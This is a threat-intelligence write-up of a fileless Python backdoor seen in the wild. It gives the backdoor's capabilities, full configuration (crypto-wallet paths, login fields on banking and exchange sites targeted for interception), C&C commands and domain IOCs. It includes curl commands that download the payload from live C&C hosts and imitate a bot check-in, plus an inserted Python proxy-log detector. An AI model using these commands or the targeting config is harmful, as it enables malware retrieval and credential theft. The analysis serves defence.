RANSOM WAR #1

There is a significant increase in ransomware attacks, with many organizations hit by (almost) unknown threats that mix APT technologies with improved offensive features.

Of course, after such an incident, companies should avoid paying the ransoms, and real backups could help in case of large incidents. But let’s focus on a specific attack that is currently being carried out on the Internet by stealthy actors.

This article was created thanks to TEHTRIS SOC and TEHTRIS R&D teams. Of course, we are using TEHTRIS EDR to fight against these threats: enhanced detection & response against spying and sabotage operations.

Introduction

In this short article, we will examine a newly uncovered fileless APT that has been used by threat actors in the wild. As of today, all the related domains are still active. This is a live attack over the Internet.

This backdoor is a multi-stage payload whose last stage is a Python3 reflective DLL embedding Cython-compiled modules. This last stage has been seen deployed through EXE droppers and PowerShell commands.

Capabilities

As the “core” Python module in the screenshot shows, the backdoor has various capabilities, including:

  • Communication over:
    • Direct encrypted TCP connection
    • Twitter
    • I2P
    • Slack
    • Tor
    • DNS
    • Google
    • XMPP
  • AD recon via embedded SharpHound
  • Network scan
  • SMB pivoting
  • Command execution
  • Python code evaluation
  • Shellcode execution
  • Execution of other PE from memory
  • Credential harvesting via Mimikatz and LaZagne
  • Screen recording via ffmpeg
  • Keylogging
  • Local web MITM via a local proxy to intercept various websites like bitcoin exchanges and bank websites
  • Ransomware deployment
  • UAC bypass, privilege escalation and persistence via the WinPwnage project

At the time of writing, all those files can be downloaded directly from the C&C if you have a correct User-Agent and Referer.

Note that if you first send a malformed request (an unexpected URL, or a wrong Content-Type, User-Agent or Referer), all your subsequent requests will get 404 responses.

The following curl command can be used to download the Python library archive and the PE payload:

curl -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)' -H 'Referer: https://www.google.com' 'https://tedxns.com/api/get_file/c2b469a7-d628-4804-8cca-5b734c5c6b42' -o loot.7z

SHA256 of the archive: 01e8cf9c1390dfe2b486e7bdd12f01aeb634fbf4d88890435ee97da401810049

Configuration

The malware configuration looks like the following:

{
    {
        "domain_key_uri": "/api/users",
        "extra_beacon_port": 50105,
        "hosts": "benreat.com,tedxns.com,planlamaison.com,sarymar.com,teamchuan.com",
        "knock_jitter": 20,
        "knock_timeout": 300,
        "knock_uri": "/api/userlogin",
        "logs_uri": "/api/imageupload",
        "post_log_fmt": "type=post&name=%s&url=%s&user_agent=%s&process=%s&referer=%s&keylog=%s&data=%s",
        "referer": "https://www.google.com",
        "secure": 1,
        "user_agent": "Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
        "zips_uri": "/api/userdata"
    },
    "backdoor": {
        "enabled": 0
    },
    "dirs": [
        "%APPDATA%\\Agama",
        "%APPDATA%\\Armory",
        "%APPDATA%\\B3-CoinV2",
        "%APPDATA%\\BeerMoney",
        "%APPDATA%\\Bitcloud",
        "%APPDATA%\\Bitcoin",
        "%APPDATA%\\BitcoinZ",
        "%APPDATA%\\bitconnect",
        "%APPDATA%\\Bither",
        "%APPDATA%\\bitmonero",
        "%APPDATA%\\BlocknetDX",
        "%APPDATA%\\Cybroscoin",
        "%APPDATA%\\Daedalus",
        "%APPDATA%\\DashCore",
        "%APPDATA%\\DeepOnion",
        "%APPDATA%\\DigiByte",
        "%APPDATA%\\Dogecoin",
        "%APPDATA%\\ElectronCash",
        "%APPDATA%\\Electrum",
        "%APPDATA%\\Electrum-LTC",
        "%APPDATA%\\Ember",
        "%APPDATA%\\EmeraldWallet",
        "%APPDATA%\\Ethereum Wallet",
        "%APPDATA%\\Exodus",
        "%APPDATA%\\FairCoin",
        "%APPDATA%\\faircoin2",
        "%APPDATA%\\Florincoin",
        "%APPDATA%\\FORT",
        "%APPDATA%\\GambitCoin",
        "%APPDATA%\\GeyserCoin",
        "%APPDATA%\\GreenCoinV2",
        "%APPDATA%\\GridcoinResearch",
        "%APPDATA%\\Gulden",
        "%APPDATA%\\Hush",
        "%APPDATA%\\IOTA Wallet",
        "%APPDATA%\\Komodo",
        "%APPDATA%\\Learncoin",
        "%APPDATA%\\lisk-nano",
        "%APPDATA%\\Litecoin",
        "%APPDATA%\\Minexcoin",
        "%APPDATA%\\mSIGNA_Bitcoin",
        "%APPDATA%\\MultiBitHD",
        "%APPDATA%\\MultiDoge",
        "%APPDATA%\\Neon",
        "%APPDATA%\\NXT",
        "%APPDATA%\\Parity",
        "%APPDATA%\\Particl",
        "%APPDATA%\\Peercoin",
        "%APPDATA%\\pink2",
        "%APPDATA%\\PPCoin",
        "%APPDATA%\\Qtum",
        "%APPDATA%\\RainbowGoldCoin",
        "%APPDATA%\\RoboForm",
        "%APPDATA%\\StartCOIN-v2",
        "%APPDATA%\\straks",
        "%APPDATA%\\Stratis",
        "%APPDATA%\\TREZOR Bridge",
        "%APPDATA%\\TrumpCoinV2",
        "%APPDATA%\\VeriCoin",
        "%APPDATA%\\Verium",
        "%APPDATA%\\Viacoin",
        "%APPDATA%\\VivoCore",
        "%APPDATA%\\Xeth",
        "%APPDATA%\\Zcash",
        "%APPDATA%\\ZcashParams",
        "%APPDATA%\\Zetacoin",
        "%APPDATA%\\StratisNode",
        "%PROGRAMDATA%\\electroneum",
        "%PROGRAMDATA%\\bitmonero",
        "%LOCALAPPDATA%\\bisq",
        "%LOCALAPPDATA%\\copay",
        "%LOCALAPPDATA%\\programs\\zap-desktop",
        "%LOCALAPPDATA%\\RippleAdminConsole",
        "%LOCALAPPDATA%\\StellarWallet",
        "%ALLDRIVESROOTS%\\Alliance"
    ],
    "dirs_keys": [
        "coin",
        "wallet",
        "diebold",
        "altaro",
        "unitrends",
        "wincor",
        "magtek",
        "payment",
        "ncr",
        "replication",
        "bitmessage",
        "veeam",
        "backup",
        "filemaker",
        "back-up",
        "swift",
        "screenconnect",
        "aldelo",
        "bank",
        "passw",
        "avamar",
        "htape"
    ],
    "ffmpeg": {
        "command": "ffmpeg.exe -f gdigrab -i desktop -pix_fmt yuv420p -threads 2 -c:v libvpx-vp9 -crf 40 -b:v 0 -speed 5",
     I
out": 60
    },
    "keylog": {
        "date_format": "%H:%M:%S-%d:%b:%Y",
        "format": "\n\n[%s (%s) – %s]\n"
    },
    "mitm": {
        "enabled": 1,
        "exclusion": [
            "cc0141.bizsol.anser.ne.jp",
            "wupos.westernunion",
            "xpressmoney.biz",
            "webpos.epayworldwide.com",
            "cc.b-direct.saitamaresona.co.jp",
            "cc0181.eb.shinwabank.co.jp",
            "cc0001.b-web.mizuhobank.co.jp",
            "maza.cc",
            "light.webmoney.ru",
            "light.wmtransfer.com",
            "business24.cz",
            "certificate.us.army.mil"
        ],
        "get_as_post_marker": "&extra_flag_51783=",
        "hr_marker": "/automation_13111949/",
        "post_log_limit": 102400,
        "screens": [
            "blvlva.secure.fundsxpress.com|passcode",
            "cibng.ibanking-services.com/EamWeb/Remote/RemoteLoginAPI.aspx|_textBoxCompanyId,_textBoxUserId",
            "cityntl.webcashmgmt.com/wcmfd/wcmpw/CustomerLogin|organizationid,userid,password",
            "client.schwab.com/Login/SignOn/SignOn.ashx|txtPassword",
            "connect.secure.wellsfargo.com/auth/login/do|j_password",
            "express.53.com/portal/auth/login/Login|username,password",
            "login.morganstanleyclientserv.com/msologin/handler/proxy/auth/authenticate|Userid,Password",
            ".chase.com/auth/fcc/login|auth_userId,auth_passwd",
            "onepass.regions.com/oaam_server/loginAuth.do|userid,pass",
            "personal.vanguard.com/us/AuthenticationServiceServlet|USER,PASSWORD",
            "secure.bankofamerica.com|onlineId,passcode",
            "sellercentral-europe.amazon|email,password",
            "sellercentral.amazon.com/ap/signin|email,password",
            "www.security.us.hsbc.com/gsa/passwordAuth|username,password",
            "www2.secure.hsbcnet.com/uims/portal/IDV_OTP_CHALLENGE|idv_OtpCredential",
            "onlinebanking.mtb.com|UserId,Passcode",
            "accounts.logme.in/login.aspx|email,password",
            "www.gotomypc.com/users/login|UserId,Password",
            "authentication.logmeininc.com/login|emailAddress,password",
            "www.bitfinex.com/sessions|login,password",
            "poloniex.com/login|username,password",
            "www.coinbase.com/sessions|email,password",
            ".fiservse.net|PrincipalID,PrincipalPWD",
            "exchange.gemini.com/signin|email,password",
            "www.binance.com/user/login.html|email,password",
            "www.cryptopia.co.nz/Login|EmailAddress,Password",
            "www.bittrex.com/Account/Login|UserName,Password",
            "fxpayments.americanexpress.com/fxipfo/IPLogin.do|userName",
            "cm.netteller.com/login2008/Authentication/Views/Login.aspx|IdTextBox",
            "access.jpmorgan.com/prelogin|userID",
            "my.electroneum.com/authenticate|my_pin",
            "chsec.wellsfargo.com/login/login.fcc|PASSWORD",
            "wexhealthcard.com/LoginPage.aspx|TextBoxUsername,TextBoxPassword",
            "/Login|ctl00$Main$userNameBox,ctl00$Main$passwordBox",
            "/ebc_ebc1961/|PWD=",
            "signatureny.ebanking-services.com/EamWeb/account/login.aspx|textBoxCompanyId,textBoxUserId",
            "businessbankingbdc.tdcommercialbanking.com|ConnectID,password",
            "securentrycorp.nsbank.com|publicCred1"
        ],
        "sni_invalid_doman": "cloudflare.com"
    },
    "nmc_api_url": "https://api.opennicproject.org/geoip/?json&ipv=4",
    "nmc_dns": [
        "167.160.36.72",
        "172.106.170.81",
        "185.141.62.5",
        "192.250.230.196"
    ],
    "registry": [
        "SOFTWARE\\S.W.I.F.T.",
        "SOFTWARE\\LogMeIn Ignition",
        "SOFTWARE\\PyBitmessage",
        "SOFTWARE\\Hex-Rays",
        "SOFTWARE\\Whole Tomato",
        "SOFTWARE\\WinLicense",
        "SOFTWARE\\LogMeIn",
        "SOFTWARE\\HexaD",
        "SOFTWARE\\GitForWindows",
        "SOFTWARE\\Cppcheck",
        "SOFTWARE\\TortoiseSVN",
        "SOFTWARE\\VisualSVN",
        "SOFTWARE\\DASH"
    ],
    "screens": {
        "count": 10,
        "interval": 4
    },
}

Botnet commands

When the agent communicates through https://evildomain/api/userlogin, the C&C server sends back its commands.

curl -v -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)' -H 'Referer: https://www.google.com' -H 'X-Name: SYSTEM!xxx!9255220' -H 'Content-Type: application/json' --data '{"ffmpeg": "0", "uptime": 765996, "rdp": 3389, "name": "SYSTEM!xxx!19255220", "admin": 1, "pid": "1798", "domain": "xxx", "dc": false, "fileless": true, "godmode": false, "mimi": true, "idle": "0", "version": "2.999", "il": 16384, "botnet": "5hsts", "local_ips": ["10.0.0.1", "169.254.31.112"], "usb": false, "wmi_av": ["N/A"], "os_ver": "2012 R2 Standard x64", "gmt": "+5"}' https://teamchuan.com/api/userlogin

*   Trying 216.189.145.132...
> POST /api/userlogin HTTP/1.1
> Host: teamchuan.com
> Accept: */*
> User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
> Referer: https://www.google.com
> X-Name: SYSTEM!xxx!9255220
> Content-Type: application/json
> Content-Length: 384
* upload completely sent off: 384 out of 384 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.10.3
< Date: Wed, 06 Nov 2019 18:05:33 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 37
< Connection: close
* Closing connection 0
!get_config[5dc314e79aadb35b95dc12a7]
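The check-in above gives defenders several things to match in proxy or TLS-inspection logs, and the reply body tells a responder which command an infected host was given. The following Python is an added example, not part of the original article or of TEHTRIS tooling; the hosts, URIs, User-Agent, Referer and X-Name shape come from this page, while the record schema (src, method, url, headers), the function names and the sample records are assumptions.

```python
import re
from urllib.parse import urlsplit

# Indicators copied from the configuration and curl transcript on this page.
C2_HOSTS = {"benreat.com", "tedxns.com", "planlamaison.com", "sarymar.com", "teamchuan.com"}
C2_PATHS = {"/api/users", "/api/userlogin", "/api/imageupload", "/api/userdata"}
C2_UA = ("Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.0; Trident/4.0; SLCC2; "
         ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)")
C2_REFERER = "https://www.google.com"
# X-Name as it appears in the transcript: three "!"-separated fields, the last numeric.
X_NAME_RE = re.compile(r"^[^!]+![^!]+!\d+$")
# Reply as in the transcript: "!command[hex id]"; a bare "!command" is also accepted (assumption).
REPLY_RE = re.compile(r"^!([a-z0-9_]+)(?:\[([0-9a-f]+)\])?$")

def score_request(rec):
    """Return the list of indicators matched by one proxy record (hypothetical schema)."""
    hits = []
    url = urlsplit(rec["url"])
    host = (url.hostname or "").lower()
    if host in C2_HOSTS or any(host.endswith("." + h) for h in C2_HOSTS):
        hits.append("c2_host")
    if url.path in C2_PATHS or url.path.startswith("/api/get_file/"):
        hits.append("c2_path")
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    if headers.get("user-agent") == C2_UA:
        hits.append("c2_user_agent")
    if rec.get("method") == "POST" and headers.get("referer") == C2_REFERER:
        hits.append("google_referer_on_post")
    if X_NAME_RE.match(headers.get("x-name", "")):
        hits.append("x_name_bot_id")
    return hits

def triage(records, min_hits=2):
    """Keep records sent to a listed host, or matching at least min_hits indicators."""
    out = []
    for rec in records:
        hits = score_request(rec)
        if "c2_host" in hits or len(hits) >= min_hits:
            out.append((rec["src"], rec["url"], hits))
    return out

def parse_reply(body):
    """Split a C&C reply body into (command, argument); None if it does not match."""
    m = REPLY_RE.match(body.strip())
    return (m.group(1), m.group(2)) if m else None

# Constructed samples: a beacon shaped like the transcript, the same shape sent to an
# unlisted domain, and a benign API call that only shares a URI with the config.
SAMPLE = [
    {"src": "10.0.0.1", "method": "POST", "url": "https://teamchuan.com/api/userlogin",
     "headers": {"User-Agent": C2_UA, "Referer": C2_REFERER, "X-Name": "SYSTEM!xxx!9255220"}},
    {"src": "10.0.0.7", "method": "POST", "url": "https://unlisted.example/api/userlogin",
     "headers": {"User-Agent": C2_UA, "Referer": C2_REFERER, "X-Name": "SYSTEM!lab!1234567"}},
    {"src": "10.0.0.9", "method": "POST", "url": "https://intranet.example/api/users",
     "headers": {"User-Agent": "Mozilla/5.0", "Referer": "https://intranet.example/"}},
]

if __name__ == "__main__":
    print(triage(SAMPLE), parse_reply("!get_config[5dc314e79aadb35b95dc12a7]"))
```

Matching on the request shape as well as the domain list keeps the detection useful if the operators rotate to domains that are not in this configuration.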

The C&C is able to send the following commands to the agent:

  • !set_config
  • !get_config
  • !update
  • !update2
  • !update3
  • !get_keylog
  • !get_cookies
  • !get_sysinfo
  • !scan_lan
  • !scan_lan_ex
  • !webdav
  • !webdav_stop
  • !active_sk
  • !deactive_sk
  • !active_bc
  • !deactive_bc
  • !eval
  • !self_destruct
  • !get_screens
  • !mem_load
  • !shellcode
  • !get_passwords
  • !docfind
  • !filefind
  • !del_cookies
  • !export_certs
  • !del_keylog
  • !reboot
  • !check_soft
  • !install_ffmpeg
  • !record_video
  • !shell
  • !kill_lgmn_tokens
  • !get_lgmn_tokens
  • !sharphound
  • !bot_hashes
  • !mimi_32
  • !mimi_64
  • !mimi_grab
  • !get_kdbx
  • !research_domain
  • !research_full
  • !wipe_rdp_creds

IOC

Evil domain names

benreat.com
tedxns.com
planlamaison.com
sarymar.com
teamchuan.com

SHA256

payload.bin: PE32 executable (console) Intel 80386, for MS Windows
